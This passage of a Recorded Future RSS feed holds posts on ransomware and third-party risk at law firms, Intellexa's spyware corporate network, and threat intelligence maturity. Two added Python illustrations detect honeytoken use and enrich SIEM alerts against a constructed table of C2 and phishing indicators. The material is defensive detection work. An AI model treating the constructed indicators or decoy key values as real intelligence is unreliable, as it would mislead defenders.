        <p><strong>Law firms</strong>, specifically, are particularly vulnerable to creating downstream <a href="https://intelligence2risk.substack.com/p/five-risk-categories">risk impacts</a> given the nature and purpose of legal services, and adversary targeting is on the rise.</p>
        <h2>The Industrial Consolidation of Legal Sector Attacks</h2>
        <p>The numbers paint a stark reality. <a href="https://programs.com/resources/law-firm-cyberattack-statistics/">Twenty percent of US law firms were targeted by cyberattacks in the past year</a>, with 56% of breached firms losing sensitive client information. The <a href="https://integrisit.com/law-firm-cybersecurity-2025-report/">average breach cost</a> reached $5.08 million, representing a 10% year-over-year increase that excludes long-term reputational damage and client defection.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_11255b32c0909cfc64c893556a30ca5222f994545.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1456" height="462" />
            </div>
          </div>
          <div>
            <div><em><a href="https://www.recordedfuture.com/platform/recorded-future-ai">Recorded Future’s AI</a></em> <em>Insights from 2025 service industry victims</em></div>
          </div>
        </div>
        <p>RansomHub has emerged as 2025’s dominant threat after absorbing talent from disrupted groups like <a href="https://therecord.media/ransomware-gang-takedown-proliferation">LockBit and ALPHV/BlackCat</a>. By <a href="https://www.bipc.com/ransomware-2025-the-digital-hydra">offering affiliates a 90/10 profit split</a> versus the standard 70/30, they’ve attracted the most capable operators in the underground economy. <a href="https://therecord.media/synnovis-healthcare-data-breach-notification-uk-patients">Qilin’s Rust-based ransomware</a> has specifically targeted legal entities with encryption-resistant payloads, making recovery nearly impossible.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1216cbfda60713263188df796c9f54d686737a8ec.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1302" height="1600" />
            </div>
          </div>
          <div>
            <div><em>Qilin ransomware profile c/o Recorded Future</em></div>
          </div>
        </div>
        <p>The chart below, derived from Recorded Future analyst notes tracking ransomware extortion sites, illustrates the growth in ransomware targeting by industry, with legal firms remaining the number one target.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1ceb881a04df23ca9b7f03db7b4650d81b8325472.png?width=750&amp;format=png&amp;optimize=medium" width="1456" height="1201" />
            </div>
          </div>
          <div>
            <div><em>Ransomware victims industry comparison in 2024 and 2025.</em></div>
          </div>
        </div>
        <p>These aren’t opportunistic attacks. Threat actors now maintain “dwell times” exceeding weeks inside firm networks, systematically identifying crown jewel intelligence before triggering extortion events. Industrialization means attackers understand exactly what creates maximum leverage: M&amp;A intelligence during active deals, litigation strategies before trial, and decades of retained client data across multiple matters.</p>
        <p>Recorded Future telemetry from the past quarter indicates that over 20 observed legal or legally adjacent firms have malware communicating with malicious command-and-control (C2) servers. While the observed traffic was 24 hours or less for some firms, other organizations saw persistence above 5 days. Certainly, a malicious implant does not equate to a full breach and exfiltration of client-sensitive data; however, it is a valuable signal to monitor for changes in third-party and fourth-party risk.</p>
        <p><em>Infographic depicting recent malware dwell times in global legal firm victims</em></p>
        <h2>When Privilege Becomes Your Adversary’s Weapon</h2>
        <p>Courts have systematically eroded attorney-client privilege protection for breach investigations, creating a dangerous trap where forensic reports become ammunition for adversaries. The <a href="https://www.hklaw.com/-/media/files/news/2020/06/after-capital-one-ruling-how-will-companies-protect-forensic-reports.pdf?la=en">Capital One decision</a> ordered production of Mandiant’s forensic report because the investigator served “business purposes” rather than pure legal advice.</p>
        <p>The cascade accelerates through “sword and shield” waiver doctrine. Any use of breach investigation findings, even citing them in discovery responses, can trigger a subject matter waiver, requiring disclosure of all privileged communications related to threat assessment and remediation strategy. The <a href="https://www.govinfo.gov/app/details/USCOURTS-njd-1_23-md-03055/context">2024 Samsung Data Breach ruling</a> made this explicit: sharing reports with 15 executives indicated business decision-making use, defeating privilege.</p>
        <p>Federal Rule of Evidence 502 creates additional exposure when companies share incident reports with regulators. In <a href="https://www.reuters.com/legal/law-firm-covington-ordered-identify-some-clients-us-sec-probe-2023-07-24/">the 2023 Covington &amp; Burling case</a>, the SEC subpoenaed the firm for the names of 298 publicly traded clients whose data “may have been exfiltrated.” Although a court eventually ruled that only seven clients had to be named, the case established that law firms cannot completely shield client identity from regulators, and those clients could then face SEC investigation for failing to disclose that their counsel was breached.</p>
        <h2>M&amp;A Intelligence Monetization at Scale</h2>
        <p>When <a href="https://www.thinkbrg.com/notice-of-data-incident/">Berkeley Research Group was hit by ransomware in March 2025</a> during a $700 million leveraged buyout by TowerBrook Capital Partners, the attack exposed M&amp;A intelligence across hundreds of concurrent deals. This wasn’t just data theft; it was a systematic opportunity for market manipulation.</p>
        <p>Academic research quantifies the damage. The <a href="https://www.bayes.citystgeorges.ac.uk/__data/assets/pdf_file/0005/170078/Cass-Deal-Leaks-Press-Release-FINAL.pdf">Intralinks/Cass Business School study</a> found 8-10% of M&amp;A deals leak annually, with leaked deals achieving 47% median premiums versus 27% for non-leaked deals, which is a 20 percentage point difference worth millions per transaction. Only 49% of leaked deals complete versus 72% of non-leaked deals.</p>
        <p>The <a href="https://www.sec.gov/newsroom/press-releases/2024-24">Tyler Loudon case (2024)</a> showed how valuable that access is: the defendant stole M&amp;A information from his wife, an attorney, and faced insider trading charges as a result.</p>
        <h2>The Systematic Failure to Assess Professional Services Risk</h2>
        <p>Only <a href="https://www.americanbar.org/groups/law_practice/resources/tech-report/2022/cybersecurity/">30% of law firms report clients asking them to complete security questionnaires</a> (and questionnaire attestations are themselves a weak measure of exposure), compared to a near-universal requirement for SaaS vendors. This exemption culture may stem from relationship bias and the misconception that “they’re not a tech vendor,” even though law firms run technology-intensive businesses.</p>
        <p>The data concentration goes untracked. A single firm may hold M&amp;A details, employee PII, trade secrets, litigation strategies, regulatory issues, and executive compensation across multiple business units that operate independently. The <a href="https://www.hipaajournal.com/orrick-herrington-sutcliffe-data-breach/">Orrick breach (2023)</a> exposed 637,000+ individuals precisely because the firm aggregated data from employment litigation, mergers and acquisitions (M&amp;A) transactions, and patent filings.</p>
        <p>Retention amnesia compounds the risk. Lawyers traditionally “<a href="https://public.dhe.ibm.com/software/emea/dk/frontlines/Best_practice_record_man.pdf">keep everything forever</a>” because of a risk-averse culture and potential regulatory requirements. Data from cases in the 1990s may still sit on unpatched legacy servers. Each year of retention adds cumulative breach exposure, yet enterprises rarely ask law firms about deletion policies or data locations.</p>
        <h2>Strategic Actions for Enterprise Defense</h2>
        <p>Treating professional services firms as high-risk technology vendors requires structural changes to vendor management frameworks.</p>
        <ul>
          <li><strong>Eliminate standing exemptions:</strong> Subject law and consulting firms to the same security requirements as SaaS vendors, including SOC 2 verification, independent audits, and quarterly assessments, without granting relationship-based waivers.</li>
          <li><strong>Map concentration risk:</strong> Identify all professional services vendors with data access across business units. Calculate total organizational exposure when single firms hold aggregated intelligence across HR, legal, finance, and compliance matters.</li>
          <li><strong>Audit fourth-party dependencies:</strong> Require disclosure of critical vendors, including MSPs, cloud providers, SaaS vendors, and document management systems. A breach of fourth-party infrastructure becomes your breach through the use of API tokens, credential harvesting, and VPN pivoting.</li>
          <li><strong>Establish time-bound access:</strong> Implement purpose-limited credentials that expire at the conclusion of a matter. Eliminate long-lived credentials that linger in engagement deliverables and consulting code repositories after the work ends.</li>
          <li><strong>Define retention requirements:</strong> Specify data deletion periods in contracts with confirmation requirements. Audit compliance quarterly, as many firms retain data indefinitely on legacy systems.</li>
          <li><strong>Deploy breach detection:</strong> Place honeytokens in systems accessible to professional services firms. Establish 24-48 hour notification SLAs with emergency credential rotation capabilities.</li>
          <li><strong>Create specialized incident response protocols:</strong> Develop playbooks specifically for law firm breaches addressing privilege complications, litigation exposure assessment, and regulatory notification requirements.</li>
          <li><strong>Use threat intelligence</strong> to map services firms’ domain and IP space. Use the infrastructure map to monitor and alert on observed traffic between malware implants and command-and-control (C2) infrastructure. <a href="https://www.recordedfuture.com/products/third-party-intelligence">Recorded Future's Third-Party Intelligence</a> automates this monitoring across your entire vendor ecosystem, providing real-time alerts when professional services firms show compromise indicators. Combined with <a href="https://www.recordedfuture.com/use-case/ransomware">Ransomware Mitigation</a> capabilities, organizations can track ransomware group TTPs, monitor extortion sites, and receive early warnings when vendors appear on leak sites. Immediately notify affected service providers, disable organizational access, and assist in remediation.</li>
        </ul>
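        <p>As an added illustration of the “time-bound access” and “breach detection” items above (written for this page, not code from the article or from Recorded Future’s products), the Python below seeds honeytokens into vendor-accessible shares, scans access logs for any use of them, and issues matter-scoped credentials that expire on their own. The token values, principals, matter identifiers, log format and sample log lines are all constructed.</p>

```python
"""Honeytokens in vendor-accessible shares plus matter-scoped, expiring access.

Illustration written for this page, not code from the article or from any
Recorded Future product. Token values, principals, matter IDs and log lines
are all constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Honeytokens seeded into each firm's data room. They look like real key IDs
# so that anyone who scrapes the share is tempted to try them, but they are
# never used legitimately, so any appearance in logs is a high-confidence hit.
HONEYTOKENS: dict[str, str] = {
    "AKIAHONEY00000EXAMPLE": "firm-a (M&A matter 2025-014 data room)",
    "ghp_HONEY00000000000000000000000000000000": "firm-b (litigation export repo)",
}

# Constructed access-log format: ts src principal action key
LOG_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) principal=(?P<principal>\S+) "
    r"action=(?P<action>\S+) key=(?P<key>\S+)$"
)


@dataclass(frozen=True)
class HoneytokenHit:
    ts: str
    src: str
    principal: str
    action: str
    vendor: str  # which firm's share the token was planted in


def detect_honeytoken_use(log_lines: list[str]) -> list[HoneytokenHit]:
    """Return every log line in which a planted token was presented.

    Lines that do not match the expected format are skipped rather than
    treated as hits, so a parser failure can neither mask nor fake an alert.
    """
    hits: list[HoneytokenHit] = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        vendor = HONEYTOKENS.get(m["key"])
        if vendor is not None:
            hits.append(HoneytokenHit(m["ts"], m["src"], m["principal"], m["action"], vendor))
    return hits


@dataclass(frozen=True)
class MatterGrant:
    vendor: str
    matter: str
    principal: str
    expires: datetime


def issue_grant(vendor: str, matter: str, principal: str,
                issued: datetime, ttl_days: int) -> MatterGrant:
    """Purpose-limited credential: tied to one matter and expiring on its own."""
    return MatterGrant(vendor, matter, principal, issued + timedelta(days=ttl_days))


def authorize(grants: list[MatterGrant], principal: str,
              matter: str, now: datetime) -> bool:
    """Allow access only through an unexpired grant for exactly this matter."""
    return any(
        g.principal == principal and g.matter == matter and now < g.expires
        for g in grants
    )


def grants_to_revoke(grants: list[MatterGrant], now: datetime) -> list[MatterGrant]:
    """Expired grants whose principals should be disabled and keys rotated."""
    return [g for g in grants if g.expires <= now]


# Constructed sample data
SAMPLE_LOGS = [
    "2025-03-12T08:14:02Z src=203.0.113.7 principal=firm-a-reviewer action=s3:GetObject key=AKIAHONEY00000EXAMPLE",
    "2025-03-12T08:14:05Z src=198.51.100.23 principal=svc-backup action=s3:ListBucket key=AKIAIOSFODNN7EXAMPLE",
    "2025-03-12T09:01:44Z src=192.0.2.9 principal=unknown action=git:clone key=ghp_HONEY00000000000000000000000000000000",
    "malformed line that the parser must skip",
]
NOW = datetime(2025, 3, 12, 9, 0, tzinfo=timezone.utc)
GRANTS = [
    issue_grant("firm-a", "2025-014", "firm-a-reviewer", datetime(2025, 1, 10, tzinfo=timezone.utc), 60),
    issue_grant("firm-b", "2025-031", "firm-b-paralegal", datetime(2025, 3, 1, tzinfo=timezone.utc), 45),
]

if __name__ == "__main__":
    for hit in detect_honeytoken_use(SAMPLE_LOGS):
        print(f"ALERT {hit.ts} token planted in {hit.vendor} used by {hit.principal} from {hit.src}")
    for g in grants_to_revoke(GRANTS, NOW):
        print(f"REVOKE {g.principal} (matter {g.matter} grant expired {g.expires.date()})")
```

        <p>The detector names the firm whose share held the token, so a hit points at the leaking engagement before the vendor has disclosed anything; the grant check refuses access to a different matter even while the credential is still valid, and the revocation list is what the 24-48 hour rotation SLA acts on.</p>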
        <h2>Wrap-Up</h2>
        <p>The evidence from 2024 and 2025 makes the stakes undeniable. With <a href="https://www.findlaw.com/legalblogs/law-and-life/why-law-firms-are-prime-targets-for-cyberattacks/">21 law firm breaches in just the first five months of 2024</a> and incidents like Williams &amp; Connolly’s <a href="https://www.securityweek.com/chinese-hackers-breached-law-firm-williams-connolly-via-zero-day/">nation-state compromise</a> and Berkeley Research Group’s ransomware during active M&amp;A, the pattern is clear.</p>
        <p>When your law firm holding decades of critical data gets breached, you don’t have a vendor incident. You have a strategic intelligence compromise with multi-year competitive implications that traditional third-party risk frameworks didn’t adequately contemplate, as they exempt “trusted advisors” from the security scrutiny their data concentration demands. The shift from relationship-based trust to risk-based verification isn’t optional; it’s survival.</p>
        <p>Learn how <a href="https://www.recordedfuture.com/use-case/ransomware">Recorded Future's Ransomware Mitigation</a> and <a href="https://www.recordedfuture.com/products/third-party-intelligence">Third-Party Intelligence</a> solutions work together to protect against cascading vendor risk. From tracking ransomware groups targeting legal firms to monitoring your vendors for real-time compromise indicators, you can detect and respond to vendor compromises before they cascade into your organization.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1598a88927a7d76c46d08ac87690a31e4ecc61757.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Intellexa’s Global Corporate Web]]></title>
            <link>https://www.recordedfuture.com/research/intellexas-global-corporate-web</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/research/intellexas-global-corporate-web</guid>
            <pubDate>Wed, 03 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Uncover Intellexa’s global corporate web powering Predator spyware, front companies, and expanding targeting from civil society to executives worldwide.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>The author, Julian-Ferdinand Vögele, thanks Amnesty International's Security Lab for its ongoing reporting on the Intellexa and Predator spyware ecosystem. Today, Security Lab published a related report on Intellexa, which can be found <a href="https://securitylab.amnesty.org/latest/2025/12/intellexa-leaks-predator-spyware-operations-exposed/">here</a>.</div>
          </div>
        </div>
        <p>NOTE: This was updated on February 20, 2026, with a minor correction.</p>
        <h2>Executive Summary</h2>
        <p>Insikt Group identified several individuals and entities linked to Intellexa and its broader network of associated companies. These connections span technical, operational, and corporate roles, including backend development, infrastructure setup, and company formation. Using export and import data, Insikt Group identified one entity linked to the previously reported Czech cluster that facilitated the shipment of Intellexa products to clients. In at least one instance, a direct delivery was made to an end user, while additional entities in Kazakhstan and the Philippines appear to have been involved in product imports, indicating an expanding network footprint. Two additional entities in the advertising sector may be tied to the “Aladdin” ad-based infection vector, previously associated with the Czech cluster via a leaked 2022 invoice. In addition, Recorded Future’s proprietary intelligence revealed ongoing Predator spyware activity in multiple countries, including new evidence of its deployment in Iraq.</p>
        <p>The continued domestic use of mercenary spyware such as Predator poses significant privacy, legal, and physical security risks worldwide. Although civil society remains the primary target in most publicly documented cases, recent evidence shows that executives and other high-profile individuals with substantial intelligence value are increasingly being targeted as well. Due to Predator’s costly licensing model, operators are likely to reserve its deployment for high-value strategic targets, placing politicians, business leaders, and individuals in sensitive roles at heightened risk. Meanwhile, the widespread and likely unlawful use of spyware against political opposition continues to be a pressing issue under investigation in several European Union (EU) member states, including <a href="https://www.theguardian.com/world/2024/apr/01/poland-launches-inquiry-into-previous-governments-spyware-use">Poland</a> and <a href="https://www.politico.eu/article/christos-rammos-greece-privacy-chief-fighting-prime-minister-kyriakos-mitsotakis-spyware/">Greece</a>.</p>
        <p>Insikt Group assesses that several key trends are shaping the spyware ecosystem, including growing balkanization as companies split along geopolitical lines, with some sanctioned entities seeking renewed legitimacy through acquisitions while others shift toward regions with weaker oversight (<a href="https://www.calcalistech.com/ctechnews/article/r1er11mi61e">1</a>, <a href="https://techcrunch.com/2025/10/10/spyware-maker-nso-group-confirms-acquisition-by-us-investors/">2</a>). Despite this, a core network of facilitators <a href="https://www.atlanticcouncil.org/in-depth-research-reports/issue-brief/mythical-beasts-diving-into-the-depths-of-the-global-spyware-market/">continues</a> to underpin the industry’s operations. Furthermore, rising competition and secrecy surrounding high-value exploit technologies are heightening risks of corruption, <a href="https://techcrunch.com/2025/11/03/how-an-ex-l3-harris-trenchant-boss-stole-and-sold-cyber-exploits-to-russia/">insider leaks</a>, and attacks on spyware vendors themselves. Targeting has also expanded beyond traditional civil society figures to include corporate leaders and private-sector individuals (<a href="https://www.nytimes.com/2023/03/20/world/europe/greece-spyware-hacking-meta.html">1</a>, <a href="https://techcrunch.com/2025/10/09/italian-businessmans-phone-reportedly-targeted-with-paragon-spyware/">2</a>), suggesting that the publicly visible cases represent only a fraction of a much larger, concealed global ecosystem.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>Insikt Group uncovered additional companies highly likely tied to Intellexa’s broader corporate web, particularly within the previously discussed Czech cluster. At least one of these entities appears to have been used to ship Intellexa products to clients, offering further insight into Intellexa's global business structures.</li>
          <li>Two newly identified companies appear to operate in the advertising sector and may be connected to a previously reported ad-based infection vector known as “Aladdin.” This vector was earlier associated with the Czech cluster through a leaked invoice from 2022 showing payments for a proof-of-concept to an individual linked to that cluster.</li>
          <li>Analysis of export and import databases revealed indications that one of the newly identified companies was used to deliver Intellexa products to end customers, either directly or through intermediaries. This research also exposed two additional entities located in Kazakhstan and the Philippines.</li>
        </ul>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/research/media_157108c6ad2d9500dab6015e5d3e0e0f867e6057a.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[The Maturity Gap: The Next Frontier in Threat Intelligence]]></title>
            <link>https://www.recordedfuture.com/blog/maturity-gap-next-frontier-in-threat-intelligence</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/maturity-gap-next-frontier-in-threat-intelligence</guid>
            <pubDate>Wed, 03 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Learn what advanced threat intelligence maturity really means and how to close the gap between current capabilities and predictive, autonomous operations.]]></description>
            <content:encoded><![CDATA[
      <div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1dca120266656dd3db5b0049e0c442a76bc5aa87c.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="600" />
            </div>
          </div>
          <div>
            <div>
              <h1>The Maturity Gap: The Next Frontier in Threat Intelligence</h1>
            </div>
          </div>
        </div>
      </div>
      <div></div>
      <div>
        <h2>Introduction</h2>
        <p>In Recorded Future’s <a href="https://pages.recordedfutureext.com/2025-State-of-Threat-Intelligence-Report.html?_gl=1*fkod6r*_gcl_aw*R0NMLjE3NjI5NjQyNjAuQ2p3S0NBaUFfZERJQmhCNkVpd0F2emMxY055a29EUU9nWk5jMzhqcXhFN0pJVE0zbER1SXl0SmZ1d1NkdjdLdVRka29NQThsM2VGanN4b0NzYllRQXZEX0J3RQ..*_gcl_au*MjQ3MTMwMjMzLjE3NTczNDQ0NTM.">2025 State of Threat Intelligence report</a>, 49% of enterprises describe their threat intelligence maturity as advanced — a figure that might surprise anyone who sees how complex this work remains in practice. While many organizations have made real progress, few have achieved the seamless integration and automation that “advanced” maturity implies.</p>
        <p>At the same time, 87% of respondents expect significant improvement within the next two years, showing clear momentum and intent. The gap between today’s capabilities and tomorrow’s ambitions reflects a familiar reality: most teams have the right data but struggle to connect, automate, and operationalize it across their environments.</p>
        <p>This article explores what advanced maturity really looks like, why progress often stalls, and how enterprises can accelerate their evolution using insights from this year’s report.</p>
        <h2>What Advanced Threat Intelligence Maturity Really Means</h2>
        <p>Recorded Future’s <a href="https://www.recordedfuture.com/resources/maturity-assessment">maturity assessment model</a> outlines four stages of progress: Reactive, Proactive, Predictive, and Autonomous. Each stage reflects a higher level of integration, automation, and alignment across the business.</p>
        <p>Advanced maturity sits toward the predictive and autonomous end of that model. At this level, intelligence operates continuously, informing security and risk decisions in real time. Teams can see what’s changing across their environment and act quickly to limit impact.</p>
        <p>Mature programs pull in data from multiple internal and external sources, from threat feeds and vulnerability scanners to dark web monitoring and attack surface mapping. They use automation to cross-reference that information, enrich alerts with context, and flag the events that matter most. The same intelligence flows directly into the tools that analysts already use, such as SIEM and SOAR platforms, where it can trigger playbooks or prioritize vulnerabilities for patching. The result is less time spent chasing false positives and more time spent preventing real incidents.</p>
        <p>Ultimately, advanced maturity is about action. Intelligence should help teams decide faster, target the right adversaries, and strengthen how the SOC, red team, and leadership make decisions every day.</p>
        <h2>Why Most Organizations Still Struggle to Advance</h2>
        <p>Even as threat intelligence tools improve, most enterprises still face the same structural barriers that slow maturity. In the <a href="https://pages.recordedfutureext.com/2025-State-of-Threat-Intelligence-Report.html?_gl=1*fkod6r*_gcl_aw*R0NMLjE3NjI5NjQyNjAuQ2p3S0NBaUFfZERJQmhCNkVpd0F2emMxY055a29EUU9nWk5jMzhqcXhFN0pJVE0zbER1SXl0SmZ1d1NkdjdLdVRka29NQThsM2VGanN4b0NzYllRQXZEX0J3RQ..*_gcl_au*MjQ3MTMwMjMzLjE3NTczNDQ0NTM.">2025 State of Threat Intelligence report</a>, nearly half of respondents (48%) list poor integration with existing security tools among their top three pain points, and 16% rank it as their biggest issue. Siloed feeds and disconnected platforms continue to make it difficult to operationalize intelligence across the security stack.</p>
        <p>Another 50% of security professionals cite difficulty verifying the credibility and accuracy of intelligence. Without confidence in the data, analysts hesitate to automate or share findings broadly, keeping threat intelligence trapped in manual workflows and siloed from a wider audience of stakeholders who would benefit from the intelligence.</p>
        <p>Though 46% report information overload as a major obstacle, volume isn’t the only issue. It’s also context. The same percentage say intelligence often lacks relevance to their environment, which makes it harder to link threats to business risk or decide what truly deserves attention.</p>
        <p>These findings reflect an evolving market need: integration, trust, and relevance. Many teams have invested in more data and technology but still struggle to connect them in ways that deliver measurable improvement. The result is effort without momentum: progress that looks strong on paper but feels limited in day-to-day operations.</p>
        <h2>How to Build an Advanced Threat Intelligence Function</h2>
        <p>Closing the maturity gap starts with turning threat intelligence from a standalone feed into a connected ecosystem of security tools that consume and exchange intelligence to inform decisions in real time. Most teams already have the ingredients — data feeds, automation platforms, and skilled analysts — but they’re often fragmented. Progress comes from building workflows that make intelligence part of everyday operations rather than a separate discipline.</p>
        <ul>
          <li><strong>Standardize and unify intelligence inputs.</strong> Consolidate vendors and combine internal telemetry with external threat data to create a single, reliable view of risk. When data sources align, teams can see the same picture and respond faster.</li>
          <li><strong>Automate enrichment and correlation.</strong> Replace manual investigation with automated context-building workflows that add detail to alerts as they’re generated. This helps analysts focus on analysis and decision-making instead of repetitive data gathering.</li>
          <li><strong>Integrate with core systems.</strong> Connect threat intelligence to SIEM, SOAR, EDR, and vulnerability management platforms so insights feed directly into detection and response. Integration reduces delay between visibility and action.</li>
          <li><strong>Leverage AI for speed and synthesis.</strong> Use AI models to summarize reports, surface anomalies, and streamline triage without increasing headcount. Automation at this level buys time for higher-value analysis.</li>
          <li><strong>Continuously measure maturity.</strong> Benchmark progress with frameworks like <a href="https://www.recordedfuture.com/resources/maturity-assessment">Recorded Future’s Threat Intelligence Maturity Assessment</a> to identify gaps and show measurable improvement over time.</li>
          <li><strong>Translate threats into impact.</strong> Map threats to the systems, data, and uptime they affect. When leaders understand operational impact, they can prioritize defenses that protect what matters most.</li>
        </ul>
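        <p>An added worked example of the enrichment, correlation and integration steps above (an illustration written for this page, not code from the article or from any Recorded Future product): SIEM alerts are joined against a local indicator table and an asset-criticality map, scored, routed to a SOAR playbook or an analyst queue, and grouped into incidents by shared indicator. The indicators, hosts, risk values, alerts and scoring thresholds are all constructed assumptions.</p>

```python
"""Alert enrichment and correlation against a local indicator table.

Added illustration for this page; not code from the article or from any
Recorded Future product or API. Indicators, hosts, scores and alerts are
constructed, and the scoring weights and thresholds are assumptions.
"""
from __future__ import annotations

# Threat-intelligence context keyed by indicator (constructed). In practice
# this table is populated from a TIP or vendor feed.
INDICATORS = {
    "203.0.113.45": {"risk": 89, "type": "ip", "context": "command-and-control server", "sightings": 4},
    "evil-update.example": {"risk": 65, "type": "domain", "context": "phishing landing page", "sightings": 2},
}

# Business context the SIEM alone lacks: 1 (workstation) to 5 (crown jewels).
ASSET_CRITICALITY = {"wks-117": 2, "wks-204": 1, "srv-db1": 5}

# Raw SIEM alerts as they arrive (constructed).
ALERTS = [
    {"id": "a1", "host": "wks-117", "indicator": "203.0.113.45", "rule": "outbound-to-new-ip"},
    {"id": "a2", "host": "wks-204", "indicator": "203.0.113.45", "rule": "outbound-to-new-ip"},
    {"id": "a3", "host": "wks-117", "indicator": "evil-update.example", "rule": "dns-new-domain"},
    {"id": "a4", "host": "srv-db1", "indicator": "198.51.100.10", "rule": "outbound-to-new-ip"},
]


def enrich(alert: dict) -> dict:
    """Attach indicator context and asset criticality, then pick a route.

    An indicator with no intelligence is not dropped: it goes to a triage
    queue so the gap in coverage stays visible instead of silently ignored.
    """
    intel = INDICATORS.get(alert["indicator"])
    crit = ASSET_CRITICALITY.get(alert["host"], 1)
    if intel is None:
        return {**alert, "intel": None, "priority": None, "route": "triage-queue"}
    priority = min(100, intel["risk"] + 10 * (crit - 1))  # assumed weighting
    if priority >= 80:
        route = "soar:isolate-host"   # hand to a playbook, no analyst wait
    elif priority >= 50:
        route = "analyst-queue"
    else:
        route = "log-only"
    return {**alert, "intel": intel, "priority": priority, "route": route}


def correlate(enriched: list[dict]) -> dict[str, dict]:
    """Group enriched alerts that share an indicator into one incident.

    Two workstations beaconing to the same C2 are one intrusion, not two
    tickets; the incident inherits the highest priority among its alerts.
    """
    incidents: dict[str, dict] = {}
    for e in enriched:
        if e["intel"] is None:
            continue
        inc = incidents.setdefault(e["indicator"], {
            "context": e["intel"]["context"], "hosts": [], "alerts": [], "priority": 0,
        })
        inc["hosts"].append(e["host"])
        inc["alerts"].append(e["id"])
        inc["priority"] = max(inc["priority"], e["priority"])
    return incidents


def run_pipeline(alerts: list[dict]) -> tuple[list[dict], dict[str, dict]]:
    """Enrich every alert, then correlate the ones with intelligence context."""
    enriched = [enrich(a) for a in alerts]
    return enriched, correlate(enriched)


if __name__ == "__main__":
    enriched, incidents = run_pipeline(ALERTS)
    for e in enriched:
        print(e["id"], e["host"], e["priority"], e["route"])
    for ind, inc in incidents.items():
        print("incident", ind, inc["context"], inc["hosts"], "priority", inc["priority"])
```

        <p>The same indicator seen on a more critical asset outranks it on a plain workstation, the two beacons to one command-and-control address collapse into a single incident, and the alert with no intelligence match is routed to triage rather than discarded, which is how the relevance and credibility gaps the report describes stay visible to the team.</p>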
        <h2>What Predictive and Autonomous Intelligence Deliver</h2>
        <p>In Recorded Future’s maturity model, predictive intelligence marks the point where teams move from detection to anticipation. Automation and analytics reveal early warning signs like new attacker infrastructure, emerging vulnerabilities, or shifts in adversary behavior, and feed that insight into prevention and risk planning. Predictive doesn’t mean knowing the future; it means seeing enough of what’s changing to act faster and more precisely.</p>
        <p>From here, intelligence systems connect signals across internal telemetry, ISACs, and external threat data to map adversary intent and likely attack paths. That awareness helps teams focus on the exposures most likely to impact their environment, improving visibility and reducing uncertainty before an incident occurs.</p>
        <p>At the autonomous stage, those workflows become largely self-directing. Machine learning and automation correlate data, generate detection rules, and trigger responses at a speed and scale that manual teams can’t sustain. Analysts move from running processes to refining them — validating alerts, adjusting priorities, and improving the quality of automation.</p>
        <p>Full automation isn’t always possible. Legacy systems, uneven tool coverage, and budget limits mean some work will always remain manual. But even partial autonomy delivers meaningful gains. Teams respond faster, cut repetitive tasks, and keep budgets within their boundaries. Most importantly, they protect uptime, secure sensitive data, and grow customer trust with greater consistency and control.</p>
        <h2>Closing the Maturity Gap</h2>
        <p>The 2025 State of Threat Intelligence findings show clear progress, but they also highlight how far most organizations still have to travel. Advanced maturity isn’t an end destination, but rather the milestone where intelligence becomes routine, embedded, and measurable across the business.</p>
        <p>Bridging the gap requires more than new tools. It takes alignment between technology, people, policy, and process: building workflows that connect intelligence to risk decisions, automating where it adds the most value, and measuring improvement over time. Every organization sits somewhere on this curve. The next step is to understand where you are, identify what’s holding you back, and make incremental changes that move intelligence closer to daily operations.</p>
        <p>Use the <a href="https://www.recordedfuture.com/resources/maturity-assessment">Recorded Future Threat Intelligence Maturity Assessment</a> to benchmark your progress, and download the full <a href="https://pages.recordedfutureext.com/2025-State-of-Threat-Intelligence-Report.html?_gl=1*fkod6r*_gcl_aw*R0NMLjE3NjI5NjQyNjAuQ2p3S0NBaUFfZERJQmhCNkVpd0F2emMxY055a29EUU9nWk5jMzhqcXhFN0pJVE0zbER1SXl0SmZ1d1NkdjdLdVRka29NQThsM2VGanN4b0NzYllRQXZEX0J3RQ..*_gcl_au*MjQ3MTMwMjMzLjE3NTczNDQ0NTM.">2025 State of Threat Intelligence report</a> to see how peers are advancing their programs, and what it takes to close the gap for good.</p>
      </div>
      <div></div>
    ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1dca120266656dd3db5b0049e0c442a76bc5aa87c.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Inside the CopyCop Playbook: How to Fight Back in the Age of Synthetic Media]]></title>
            <link>https://www.recordedfuture.com/blog/inside-the-copycop-playbook</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/inside-the-copycop-playbook</guid>
            <pubDate>Tue, 02 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Uncover how Russia’s CopyCop network uses AI-generated news and fake media sites to influence global audiences—and learn the key defenses against synthetic media threats.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <h2>Key Takeaways</h2>
              <ul>
